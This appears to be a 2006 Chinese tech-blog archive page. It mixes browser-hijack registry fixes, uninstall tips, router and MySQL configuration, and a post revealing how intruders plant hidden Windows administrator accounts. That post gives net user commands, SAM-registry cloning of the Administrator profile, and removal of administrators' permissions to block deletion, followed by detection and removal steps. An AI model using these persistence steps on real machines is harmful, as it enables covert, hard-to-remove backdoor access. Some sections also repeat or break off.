恶意网页越来越厉害,本文就给大家讲恶意网页修改11种系统配置的处理办法。
1.禁止使用电脑
现象描述:尽管网络流氓们用这一招的不多,但是一旦你中招了,后果真是不堪设想!浏览了含有这种恶意代码的网页其后果是:”关闭系统”、”运行”、”注销”、注册表编辑器、DOS程序、运行任何程序被禁止,系统无法进入”实模式”、驱动器被隐藏。
解决办法:一般来说上述八大现象你都遇上了的话,基本上系统就给”废”了,建议重装。
2.格式化硬盘
现象描述:这类恶意代码的特征就是利用IE执行ActiveX的功能,让你无意中格式化自己的硬盘。只要你浏览了含有它的网页,浏览器就会弹出一个警告说”当前的页面含有不安全的ctiveX,可能会对你造成危害”,问你是否执行。如果你选择”是”的话,硬盘就会被快速格式化,因为格式化时窗口是最小化的,你可能根本就没注意,等发现时已悔之晚矣。
解决办法:除非你知道自己是在做什么,否则不要随便回答”是”。该提示信息还可以被修改,如改成”Windows正在删除本机的临时文件,是否继续”,所以千万要注意!此外,将计算机上Format.com、Fdisk.exe、Del.exe、Deltree.exe等命令改名也是一个办法。
3.下载运行木马程序
现象描述:在网页上浏览也会中木马?当然,由于IE5.0本身的漏洞,使这样的新式入侵手法成为可能,方法就是利用了微软的可以嵌入exe文件的eml文件的漏洞,将木马放在eml文件里,然后用一段恶意代码指向它。上网者浏览到该恶意网页,就会在不知不觉中下载了木马并执行,其间居然没有任何提示和警告!
解决办法:第一个办法是升级您的IE5.0,IE5.0以上版本没这毛病;此外,安装金山毒霸、Norton等病毒防火墙,它会把网页木马当作病毒迅速查截杀。
4.注册表的锁定
现象描述:有时浏览了恶意网页后系统被修改,想要用Regedit更改时,却发现系统提示你没有权限运行该程序,然后让你联系管理员。晕了!动了我的东西还不让改,这是哪门子的道理!
解决办法:能够修改注册表的又不止Regedit一个,找一个注册表编辑器,例如:Reghance。将注册表中的HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值”DisableRegistryTools”键值恢复为”0″,即可恢复注册表。
5.默认主页修改
现象描述:一些网站为了提高自己的访问量和做广告宣传,利用IE的漏洞,将访问者的IE不由分说地进行修改。一般改掉你的起始页和默认主页,为了不让你改回去,甚至将IE选项中的默认主页按钮变为失效的灰色。不愧是网络流氓的一惯做风。
解决办法:1.起始页的修改。展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中将”Start Page”的键值改为”about:blank”即可。同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中将”Start Page”的键值改为”about:blank”即可。
注意:有时进行了以上步骤后仍然没有生效,估计是有程序加载到了启动项的缘故,就算修改了,下次启动时也会自动运行程序,将上述设置改回来,解决方法如下:
运行注册表编辑器Regedit.exe,然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键,然后将下面的”registry.exe”子键(名字不固定)删除,最后删除硬盘里的同名可执行程序。退出注册编辑器,重新启动计算机,问题就解决了。
2.默认主页的修改。运行注册表编辑器,展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\,将Default-Page-URL子键的键值中的那些恶意网站的网址改正,或者设置为IE的默认值。
3.IE选项按钮失效。运行注册表编辑器,将HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel中的DWORD值”Settings”=dword:1、”Links”=dword:1、”SecAddSites”=dword:1全部改为”0″,将HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值”homepage”的键值改为”0″。
·恶意网页修改11种系统配置的处理办法(2)
6.篡改IE标题栏
现象描述:在系统默认状态下,由应用程序本身来提供标题栏的信息。但是,有些网络流氓为了达到广告宣传的目的,将串值”Windows Title”下的键值改为其网站名或更多的广告信息,从而达到改变IE标题栏的目的。非要别人看他的东西,而且是通过非法的修改手段,除了”无耻”两个字,再没有其它形容词了。
解决办法:展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\下,在右半部分窗口找到串值”Windows Title”,将该串值删除。重新启动计算机。
7.篡改默认搜索引擎
现象描述:在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到网络注氓想要你去的网站。
解决办法:运行注册表编辑器,依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant,将CustomizeSearch及SearchAssistant的键值改为某个搜索引擎的网址即可。
8.IE右键修改
现象描述:有的网络流氓为了宣传的目的,将你的右键弹出的功能菜单进行了修改,并且加入了一些乱七八糟的东西,甚至为了禁止你下载,将IE窗口中单击右键的功能都屏蔽掉。
解决办法:1.右键菜单被修改。打开注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,删除相关的广告条文。
2.右键功能失效。打开注册表编辑器,展开到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,将其DWORD值”NoBrowserContextMenu”的值改为0。
9.篡改地址栏文字
现象描述:中招者的IE地址栏下方出现一些莫名其妙的文字和图标,地址栏里的下拉框里也有大量的地址,并不是你以前访问过的。
解决办法:1.地址栏下的文字。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ToolBar下找到键值LinksFolderName,将其中的内容删去即可。
2.地址栏中无用的地址。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypeURLs中删除无用的键值即可。
10.启动时弹出对话框
现象描述:1.系统启动时弹出对话框,通常是一些广告信息,例如欢迎访问某某网站等等。2.开机弹出网页,通常会弹出很多窗口,让你措手不及,恶毒一点的,可以重复弹出窗口直到死机。
解决办法:1.弹出对话框。打开注册表编辑器,找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主键,然后在右边窗口中找到”LegalNoticeCaption”和”LegalNoticeText”这两个字符串,删除这两个字符串就可以解决在启动时出现提示框的现象了。
2.弹出网页。点击”开始-运行-输入msconfig”,选择”启动”,把里面后缀为url、html、htm的网址文件都勾掉。
11.IE窗口定时弹出
现象描述:中招者的机器每隔一段时间就弹出IE窗口,地址指向网络注氓的个人主页。不晓得是不是网络流氓以为这样你就会经常光顾?
解决办法:
分类 : 娱乐休闲 | 发表时间 26-04-2006
分类 : 技术文摘 | 发表时间 25-04-2006
Windows的“资源管理器”有一个显示或隐藏文件扩展名的选项。如果选择了显示扩展名,一旦邮箱收到了“图片.jpg.exe”之类的恶意文件,完整的扩展名将使这类文件的把戏无所遁形;如果隐藏扩展名,“图片.jpg.exe”将显示为“图片.jpg”,很容易上当。但另一方面,总是显示所有文件的扩展名看起来不够整洁,而且增加了无意之中改变文件类型的风险。最理想的方案是只显示某些可能隐含风险的文件扩展名,与此同时,将其余文件的扩展名隐藏起来。
首先来强制显示EXE文件的扩展名。打开“注册表编辑器”,在“HKEY_CLASSES_ROOT”中找到exefile(不是.exe)。选中该注册键,在注册表编辑器右边窗格的空白位置按鼠标右键,选择“新建→字符串值”,设置值的名称AlwaysShowExt,然后关闭注册表编辑器。
修改这个注册键之后,无论在“资源管理器”还是其他软件之中,EXE文件的扩展名总是明确地显示出来,即使你已经选中了“隐藏已知文件类型的扩展名”选项也一样。
为最大限度地保障安全,建议对“HKEY_CLASSES_ROOT”里面的以下注册键重复执行上述步骤:cmdfile、comfile(只适用于Windows 2000/XP)、batfile和scrfile。如果你担心有人向你发送恶意的脚本文件,还可以为下列注册键添加AlwaysShowExt值:JSFile、JSEFile、VBEFile、VBSFile和WSFFile。
分类 : 技术文摘 | 发表时间 19-04-2006
随着网络的普及,网上的软件也越来越多,给大家带来了极大的方便,但有一些软件以IE插件的形式强制安装,无法卸载,顽固地驻留于用户电脑之中;有些软件在安装后,并没有提供卸载程序,即使在控制面板中将其删除,仍然会有残余的线程文件向外发送信息,用户通常只能采用手工的办法去删除,这样操作起来不但麻烦,而且还容易误删系统文件。以下是一些卸载顽固程序比较另类的方法,希望对大家有所帮助。
1、巧用QQ来卸载顽固程序
将QQ安装目录下的unins000.exe文件拷贝到要卸载文件的安装目录,再执行该程序即可!这种办法对于卸载那些反安装程序丢失或者损坏的文件有特效。
2、Winamp的卸载程序可以安全卸载大部分应用程序
首先在“我的电脑”找到Winamp安装目录下的UninstWp.exe程序,复制并粘贴到顽固程序所在的文件夹中,双击运行该程序就可以把顽固程序卸载得干干净净了。
3、运用WinRAR卸载顽固程序
通过其地址栏定位到顽固程序所在文件夹,再点工具栏上的“添加”按纽,此时会弹出“档案文件名字和参数”对话框,在“存档选项”中勾选“存档后删除原文件”点击“确定”,等压缩完成后,WinRAR会自动删除顽固软件文件夹,然后手工将刚生成的压缩包删除,一切搞定。
4、微软反间谍软件完美卸载3721程序
首先下载微软反间谍软件MicrosoftAntiSpywareInstall.exe,界面是英文的,文字相当于高中英语水平,慢慢看能懂,安装后按提示升级最新数据库,执行SCAN,后发现100多个3721,CNS*的东西,选择REMOVE,慢慢的微软反间谍软件清除3721,CNS*的东西,再提示重新启动机器;第一次3721还没清除完,在/PROGRAM FILES/下还有3721目录,先卸载网络实名,右键清除开始——程序菜单中的3721条,再运行微软反间谍软件,扫描后发现多个3721,CNS*的东西,但数量比第一次少多了选择,选择REMOVE,清除3721,CNS*的东西,再重新启动机器,这样就彻底清除3721。
3、运用WinRAR卸载顽固程序
通过其地址栏定位到顽固程序所在文件夹,再点工具栏上的“添加”按纽,此时会弹出“档案文件名字和参数”对话框,在“存档选项”中勾选“存档后删除原文件”点击“确定”,等压缩完成后,WinRAR会自动删除顽固软件文件夹,然后手工将刚生成的压缩包删除,一切搞定。
4、微软反间谍软件完美卸载3721程序
首先下载微软反间谍软件MicrosoftAntiSpywareInstall.exe,界面是英文的,文字相当于高中英语水平,慢慢看能懂,安装后按提示升级最新数据库,执行SCAN,后发现100多个3721,CNS*的东西,选择REMOVE,慢慢的微软反间谍软件清除3721,CNS*的东西,再提示重新启动机器;第一次3721还没清除完,在/PROGRAM FILES/下还有3721目录,先卸载网络实名,右键清除开始——程序菜单中的3721条,再运行微软反间谍软件,扫描后发现多个3721,CNS*的东西,但数量比第一次少多了选择,选择REMOVE,清除3721,CNS*的东西,再重新启动机器,这样就彻底清除3721。
5、运用Windows XP附带的Msicuu.exe、Msizap.exe来彻底卸载顽固程序
首先要打开Windows XP安装盘,点“Support Tools”,进入硬盘的Support Tools安装目录(X:\Program Files\Support Tools),找到Msicuu.exe并双击,于是就会弹出一个“Windows Installer Clean Up”窗口,显示当前已安装的所有程序列表。你从中选择顽固程序,然后单击“Rmove”按钮即可卸载。如果以上方法无效,建议你用Msizap.exe来卸载,方法是:打开注册表编辑器,定位到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall,在左边项中找到顽固程序的标识(例如{268723B7-A994-4286-9F85-B974D5CAFC7B}),然后依次选择“开始→程序→Windows Support Tools→Command Prompt”命令,在命令提示符后,输入以下命令:msizap T {顽固程序的标识},按回车后即可卸载顽固程序。
6、超级兔子优化王专业卸载功能卸载常见顽固软件及IE插件
首先选择优化王下的“卸载软件”功能,然后切换到“专业卸载”选项卡,此处提供了18种软件的卸载功能。超级兔子优化王软件会自动对系统进行检测,若装有该程序的话此处便会显示“已安装”,接着选中要卸载的软件,单击“下一步”就可以把这些程序清理干净,将它们彻底赶出系统。
分类 : 系统安全 | 发表时间 18-04-2006
当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。在肉鸡上建立一个隐藏的账户,以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密。
在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的账户。在系统中可以进入“命令提示符”,控制面板的“计算机管理”,“注册表”中对存在的账户进行查看,而管理员一般只在“命令提示符”和“计算机管理”中检查是否有异常,因此如何让系统账户在这两者中隐藏将是本文的重点。
一、“命令提示符”中的阴谋
其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。
点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net user piao$ 123456 /add”,回车,成功后会显示“命令成功完成”。接着输入“net localgroup administrators piao$ /add”回车,这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。
我们来看看隐藏账户的建立是否成功。在“命令提示符”中输入查看系统账户的命令“net user”,回车后会显示当前系统中存在的账户。从返回的结果中我们可以看到刚才我们建立的“piao$”这个账户并不存在。接着让我们进入控制面板的“管理工具”,打开其中的“计算机”,查看其中的“本地用户和组”,在“用户”一项中,我们建立的隐藏账户“piao$”暴露无疑。
可以总结得出的结论是:这种方法只能将账户在“命令提示符”中进行隐藏,而对于“计算机管理”则无能为力。因此这种隐藏账户的方法并不是很实用,只对那些粗心的管理员有效,是一种入门级的系统账户隐藏技术。
二、在“注册表”中玩转账户隐藏
从上文中我们可以看到用命令提示符隐藏账户的方法缺点很明显,很容易暴露自己。那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢?答案是肯定的,而这一切只需要我们在“注册表”中进行一番小小的设置,就可以让系统账户在两者中完全蒸发。
1、峰回路转,给管理员注册表操作权限
在注册表中对系统账户的键值进行操作,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”处进行修改,但是当我们来到该处时,会发现无法展开该处所在的键值。这是因为系统默认对系统管理员给予“写入D AC”和“读取控制”权限,没有给予修改权限,因此我们没有办法对“SAM”项下的键值进行查看和修改。不过我们可以借助系统中另一个“注册表编辑器”给管理员赋予修改权限。
点击“开始”→“运行”,输入“regedt32.exe”后回车,随后会弹出另一个“注册表编辑器”,和我们平时使用的“注册表编辑器”不同的是它可以修改系统账户操作注册表时的权限(为便于理解,以下简称regedt32.exe)。在regedt32.exe中来到“HKEY_LOCAL_MACHINE\SAM\SAM”处,点击“安全”菜单→“权限”,在弹出的“SAM的权限”编辑窗口中选中“administrators”账户,在下方的权限设置处勾选“完全控制”,完成后点击“确定”即可。然后我们切换回“注册表编辑器”,可以发现“HKEY_LOCAL_MACHINE\SAM\SAM”下面的键值都可以展开了。
提示: 上文中提到的方法只适用于Windows NT/2000系统。在Windows XP系统中,对于权限的操作可以直接在注册表中进行,方法为选中需要设置权限的项,点击右键,选择“权限”即可。
2、偷梁换柱,将隐藏账户替换为管理员
成功得到注册表操作权限后,我们就可以正式开始隐藏账户的制作了。来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户。点击我们的隐藏账户“piao$”,在右边显示的键值中的“类型”一项显示为0x3e9,向上来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\”处,可以找到“000003E9”这一项,这两者是相互对应的,隐藏账户“piao$”的所有信息都在“000003E9”这一项中。同样的,我们可以找到“administrator”账户所对应的项为“000001F4”。
将“piao$”的键值导出为piao$.reg,同时将“000003E9”和“000001F4”项的F键值分别导出为user.reg,admin.reg。用“记事本”打开admin.reg,将其中“F”值后面的内容复制下来,替换user.reg中的“F”值内容,完成后保存。接下来进入“命令提示符”,输入“net user piao$ /del”将我们建立的隐藏账户删除。最后,将piao$.reg和user.reg导入注册表,至此,隐藏账户制作完成。
3、过河拆桥,切断删除隐藏账户的途径
虽然我们的隐藏账户已经在“命令提示符”和“计算机管理”中隐藏了,但是有经验的系统管理员仍可能通过注册表编辑器删除我们的隐藏账户,那么如何才能让我们的隐藏账户坚如磐石呢?
打开“regedt32.exe”,来到“HKEY_LOCAL_MACHINE\SAM\SAM”处,设置“SAM”项的权限,将“administrators”所拥有的权限全部取消即可。当真正的管理员想对“HKEY_LOCAL_MACHINE\SAM\SAM”下面的项进行操作的时候将会发生错误,而且无法通过“regedt32.exe”再次赋予权限。这样没有经验的管理员即使发现了系统中的隐藏账户,也是无可奈何的。
三.专用工具,使账户隐藏一步到位
虽然按照上面的方法可以很好得隐藏账户,但是操作显得比较麻烦,并不适合新手,而且对注册表进行操作危险性太高,很容易造成系统崩溃。因此我们可以借助专门的账户隐藏工具来进行隐藏工作,使隐藏账户不再困难,只需要一个命令就可以搞定。
我们需要利用的这款工具名叫“HideAdmin”,下载下来后解压到c盘。然后运行“命令提示符”,输入“HideAdmin piao$ 123456”即可,如果显示“Create a hiden Administrator piao$ Successed!”,则表示我们已经成功建立一个账户名为piao$,密码为123456的隐藏账户。利用这款工具建立的账户隐藏效果和上文中修改注册表的效果是一样的。
四、把“隐藏账户”请出系统
隐藏账户的危害可谓十分巨大。因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统
1、添加“$”符号型隐藏账户
对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限。那么我们只需要在“命令提示符”中输入“net localgroup administrators”就可以让所有的隐藏账户现形。如果嫌麻烦,可以直接打开“计算机管
理”进行查看,添加“$”符号的账户是无法在这里隐藏的。
2、修改注册表型隐藏账户
由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到注册表中删除隐藏账户。来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”,把这里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可。
3、无法看到名称的隐藏账户
如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建立的隐藏账户名称。不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。点击“开始”→“运行”,输入“gpedit.msc”运行“组策略”,依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后点“确定”。对“审核登陆事件”和“审核过程追踪”进行相同的设置。 
进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账户就暴露无疑了。
得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限。但是我们可以在“命令提示符”中输入“net user 隐藏账户名称 654321”更改这个隐藏账户的密码。这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆。
分类 : 技术文摘 | 发表时间 17-04-2006
华为路由器与同档次的CISCO路由器在功能特性与配置界面上完全一致,有些方面还根据国内用户的需求作了很好的改进。例如中英文可切换的配置与调试界面,使中文用户再也不用面对着一大堆的英文专业单词而无从下手了。
另外它的软件升级,远程配置,备份中心,P <——Element not supported - Type: 8 Name: #comment——>PPP回拨,路由器热备份等,对用户来说均是极有用的功能特性。
在配置方面,华为3COM路由器以前的软件版本(VRP1.0-相当于CISCO的IOS)与CISCO有细微的差别,但目前的版本(VRP1.1)已和CISCO兼容,下面首先介绍VRP软件的升级方法,然后给出配置上的说明。
一、 VRP软件升级操作
升级前用户应了解自己路由器的硬件配置以及相应的引导软件bootrom的版本,因为这关系到是否可以升级以及升级的方法,否则升级失败会导致路由器不能运行。在此我们以从VRP1.0升级到VRP1.1为例说明升级的方法。
1.路由器配置电缆一端与PC机的串口一端与路由器的console口连接
2.在win95/98下建立使用直连线的超级终端,参数如下:
波特率9600,数据位8,停止位1,无效验,无流控 ,VT100终端类型
3.超级终端连机后打开路由器电源,屏幕上会出现引导信息,在出现:
Press Ctrl-B to enter Boot Menu.
时三秒内按下Ctrl+b,会提示输入密码
Please input Bootrom password:
默认密码为空,直接回车进入引导菜单Boot Menu,在该菜单下选1,即Download application program升级VRP软件,之后屏幕提示选择下载波特率,我们一般选择38400 bps,随即出现提示信息:
Download speed is 38400 bps.Please change the terminal’s speed to 38400 bps, and select XMODEM protocol.Press ENTER key when ready.
此时进入超级终端“属性”,修改波特率为38400,修改后应断开超级终端的连接,再进入连接状态,以使新属性起效,之后屏幕提示:
Downloading…CCC
这表示路由器已进入等待接收文件的状态,我们可以选择超级终端的文件“发送”功能,选定相应的VRP软件文件名,通讯协议选Xmodem,之后超级终端自动发送文件到路由器中,整个传送过程大约耗时8分半钟。完成后有提示信息出现,系统会将收到的VRP软件写入Flash Memory覆盖原来的系统,此时整个升级过程完成,系统提示改回超级终端的波特率:
Restore the terminal’s speed to 9600 bps.
Press ENTER key when ready.
修改完后记住进行超级终端的断开和连接操作使新属性起效,之后路由器软件开始启动,用show ver命令将看见相应的版本信息。
下面是与CISCO互通时应注意的地方:
二、 在默认链路层封装上的区别(主要用于DDN的配置)
1.华为VRP1.0及其以前的版本,在配置时,由于CISCO的默认链路层封装格式为HDLC,而华为路由器的默认链路层封装格式为PPP,因此为了能互通,需要将CISCO路由器的封装格式改为PPP格式,即使用命令:
encapsulation PPP
2.华为VRP1.1及其以后的版本,增加了HDLC封装格式。这样,不需要改动CISCO的封装格式,而将华为路由器的封装格式改为HDLC封装格式即可,即使用命令:
encapsulation hdlc
三、 在配置X.25上的区别
1.华为VRP1.0及其以前的版本在配置时,由于CISCO的 X25 默认封装格式为它自己的标准。而华为路由器的封装格式为国际标准IETF,因此为了能互通,需要将CISCO路由器的封装格式改为ietf格式,即使用命令:
encapsulation x25 ietf
2.华为VRP1.1及其以后的版本,特地增加了与CISCO兼容的封装格式。这样,不需要改动 CISCO 的封装格式,而将华为路由器的 X25 封装格式改为 CISCO兼容封装格式即可,即使用命令:
encapsulation x25 cisco
四、 在配置帧中继(Frame-Relay)上的区别
1.华为VRP1.0及其以前的版本,由于CISCO的默认 FR 封装格式为CISCO公司自己的标准;而华为路由器的封装格式为国际标准IETF.另外,由于在LMI(帧中继本地管理信息)类型的配置上,CISCO默认也是使用它自己的格式,而华为路由器使用的是国际标准的 Q.933a 格式,因此为了能互通,需要将 CISCO路由器的 FR 封装格式改为IETF,将LMI 改为 Q.933a 格式才能互通,即使用命令:
encapsulation frame-realy ietf
frame-realy lmi-type q933a
2.华为VRP1.1及其以后的版本,特地增加了与CISCO兼容的FR封装格式,以及LMI的格式。这样,不需要改动CISCO的封装,而只需将华为路由器的FR封装格式和LMI类型改为CISCO兼容格式即可,即使用命令:
encapsulation frame-relay cisco
frame-relay lmi-type cisco
以上各点,是在华为与 CISCO 互连时应着重注意的,如果 CISCO 用户的链路封装不是国际标准而是它自己的格式,而且 CISCO 用户又不愿修改配置,则在华为一端一定要作相应的改变。
分类 : 技术文摘 | 发表时间 17-04-2006
在安装mysql解压包时虽然安装成功但在WINDOW自动启动时无法加载MYSQL服务,通过在网上不断的找资料还有自己的实践终于搞定,希望对遇到这要问题的朋友有点作用,
如何让MYSQL服务进程中自动加载MYSQL
1.在 开始--》运行中执行 c:\mysql\bin\mysqld-nt -install (卸载时执行-uninstall)
2.把c:/mysql/my-medium.ini改名为my.ini并修改里面的相关配置拷到c:/winnt 或c:/winnts c:/windows 下
3.然后在开始--》运行 中执行 net start|stop|restart mysql
下面在本地机上采用安装的方式生成的my.ini
[注:要根据自己的实际情况修改相应的参数即可]
# MySQL Server Instance Configuration File
# ———————————————————————-
# Generated by the MySQL Server Instance Configuration Wizard
#
#
# Installation Instructions
# ———————————————————————-
#
# On Linux you can copy this file to /etc/my.cnf to set global options,
# mysql-data-dir/my.cnf to set server-specific options
# (@localstatedir@ for this installation) or to
# ~/.my.cnf to set user-specific options.
#
# On Windows you should keep this file in the installation directory
# of your server (e.g. C:\Program Files\MySQL\MySQL Server 4.1). To
# make sure the server reads the config file use the startup option
# “–defaults-file”.
#
# To run run the server from the command line, execute this in a
# command line shell, e.g.
# mysqld –defaults-file=”C:\Program Files\MySQL\MySQL Server 4.1\my.ini”
#
# To install the server as a Windows service manually, execute this in a
# command line shell, e.g.
# mysqld –install MySQL41 –defaults-file=”C:\Program Files\MySQL\MySQL Server 4.1\my.ini”
#
# And then execute this in a command line shell to start the server, e.g.
# net start MySQL41
#
#
# Guildlines for editing this file
# ———————————————————————-
#
# In this file, you can use all long options that the program supports.
# If you want to know the options a program supports, start the program
# with the “–help” option.
#
# More detailed information about the individual options can also be
# found in the manual.
#
#
# CLIENT SECTION
# ———————————————————————-
#
# The following options will be read by MySQL client applications.
# Note that only client applications shipped by MySQL are guaranteed
# to read this section. If you want your own MySQL client program to
# honor these values, you need to specify it as an option during the
# MySQL client library initialization.
#
[client]
port=3306
[mysql]
default-character-set=latin1
# SERVER SECTION
# ———————————————————————-
#
# The following options will be read by the MySQL Server. Make sure that
# you have installed the server correctly (see above) so it reads this
# file.
#
[mysqld]
# The TCP/IP Port the MySQL Server will listen on
port=3306
#Path to installation directory. All paths are usually resolved relative to this.
basedir=”C:/Program Files/MySQL/MySQL Server 5.0/”
#Path to the database root
datadir=”C:/Program Files/MySQL/MySQL Server 5.0/Data/”
# The default character set that will be used when a new schema or table is
# created and no character set is defined
default-character-set=latin1
# The default storage engine that will be used when create new tables when
default-storage-engine=INNODB
# Set the SQL mode to strict
sql-mode=”STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION”
# The maximum amount of concurrent sessions the MySQL server will
# allow. One of these connections will be reserved for a user with
# SUPER privileges to allow the administrator to login even if the
# connection limit has been reached.
max_connections=100
# Query cache is used to cache SELECT results and later return them
# without actual executing the same query once again. Having the query
# cache enabled may result in significant speed improvements, if your
# have a lot of identical queries and rarely changing tables. See the
# “Qcache_lowmem_prunes” status variable to check if the current value
# is high enough for your load.
# Note: In case your tables change very often or if your queries are
# textually different every time, the query cache may result in a
# slowdown instead of a performance improvement.
query_cache_size=0
# The number of open tables for all threads. Increasing this value
# increases the number of file descriptors that mysqld requires.
# Therefore you have to make sure to set the amount of open files
# allowed to at least 4096 in the variable “open-files-limit” in
# section [mysqld_safe]
table_cache=256
# Maximum size for internal (in-memory) temporary tables. If a table
# grows larger than this value, it is automatically converted to disk
# based table This limitation is for a single table. There can be many
# of them.
tmp_table_size=5M
# How many threads we should keep in a cache for reuse. When a client
# disconnects, the client’s threads are put in the cache if there aren’t
# more than thread_cache_size threads from before. This greatly reduces
# the amount of thread creations needed if you have a lot of new
# connections. (Normally this doesn’t give a notable performance
# improvement if you have a good thread implementation.)
thread_cache_size=8
#*** MyISAM Specific options
# The maximum size of the temporary file MySQL is allowed to use while
# recreating the index (during REPAIR, ALTER TABLE or LOAD DATA INFILE.
# If the file-size would be bigger than this, the index will be created
# through the key cache (which is slower).
myisam_max_sort_file_size=100G
# If the temporary file used for fast index creation would be bigger
# than using the key cache by the amount specified here, then prefer the
# key cache method. This is mainly used to force long character keys in
# large tables to use the slower key cache method to create the index.
myisam_max_extra_sort_file_size=100G
# If the temporary file used for fast index creation would be bigger
# than using the key cache by the amount specified here, then prefer the
# key cache method. This is mainly used to force long character keys in
# large tables to use the slower key cache method to create the index.
myisam_sort_buffer_size=8M
# Size of the Key Buffer, used to cache index blocks for MyISAM tables.
# Do not set it larger than 30% of your available memory, as some memory
# is also required by the OS to cache rows. Even if you’re not using
# MyISAM tables, you should still set it to 8-64M as it will also be
# used for internal temporary disk tables.
key_buffer_size=8M
# Size of the buffer used for doing full table scans of MyISAM tables.
# Allocated per thread, if a full scan is needed.
read_buffer_size=64K
read_rnd_buffer_size=256K
# This buffer is allocated when MySQL needs to rebuild the index in
# REPAIR, OPTIMZE, ALTER table statements as well as in LOAD DATA INFILE
# into an empty table. It is allocated per thread so be careful with
# large settings.
sort_buffer_size=212K
#*** INNODB Specific options ***
# Use this option if you have a MySQL server with InnoDB support enabled
# but you do not plan to use it. This will save memory and disk space
# and speed up some things.
#skip-innodb
# Additional memory pool
that is used by InnoDB to store metadata
# information. If InnoDB requires more memory for this purpose it will
# start to allocate it from the OS. As this is fast enough on most
# recent operating systems, you normally do not need to change this
# value. SHOW INNODB STATUS will display the current amount used.
innodb_additional_mem_pool_size=2M
# If set to 1, InnoDB will flush (fsync) the transaction logs to the
# disk at each commit, which offers full ACID behavior. If you are
# willing to compromise this safety, and you are running small
# transactions, you may set this to 0 or 2 to reduce disk I/O to the
# logs. Value 0 means that the log is only written to the log file and
# the log file flushed to disk approximately once per second. Value 2
# means the log is written to the log file at each commit, but the log
# file is only flushed to disk approximately once per second.
innodb_flush_log_at_trx_commit=1
# The size of the buffer InnoDB uses for buffering log data. As soon as
# it is full, InnoDB will have to flush it to disk. As it is flushed
# once per second anyway, it does not make sense to have it very large
# (even with long transactions).
innodb_log_buffer_size=1M
# InnoDB, unlike MyISAM, uses a buffer pool to cache both indexes and
# row data. The bigger you set this the less disk I/O is needed to
# access data in tables. On a dedicated database server you may set this
# parameter up to 80% of the machine physical memory size. Do not set it
# too large, though, because competition of the physical memory may
# cause paging in the operating system. Note that on 32bit systems you
# might be limited to 2-3.5G of user level memory per process, so do not
# set it too high.
innodb_buffer_pool_size=8M
# Size of each log file in a log group. You should set the combined size
# of log files to about 25%-100% of your buffer pool size to avoid
# unneeded buffer pool flush activity on log file overwrite. However,
# note that a larger logfile size will increase the time needed for the
# recovery process.
innodb_log_file_size=10M
# Number of threads allowed inside the InnoDB kernel. The optimal value
# depends highly on the application, hardware as well as the OS
# scheduler properties. A too high value may lead to thread thrashing.
innodb_thread_concurrency=8
分类 : 网络日志 | 发表时间 15-04-2006
有些方法当然是反编译 CHM 文件,将里面的限制代码去除后再编译成 CHM 文件,不过这样比较麻烦。
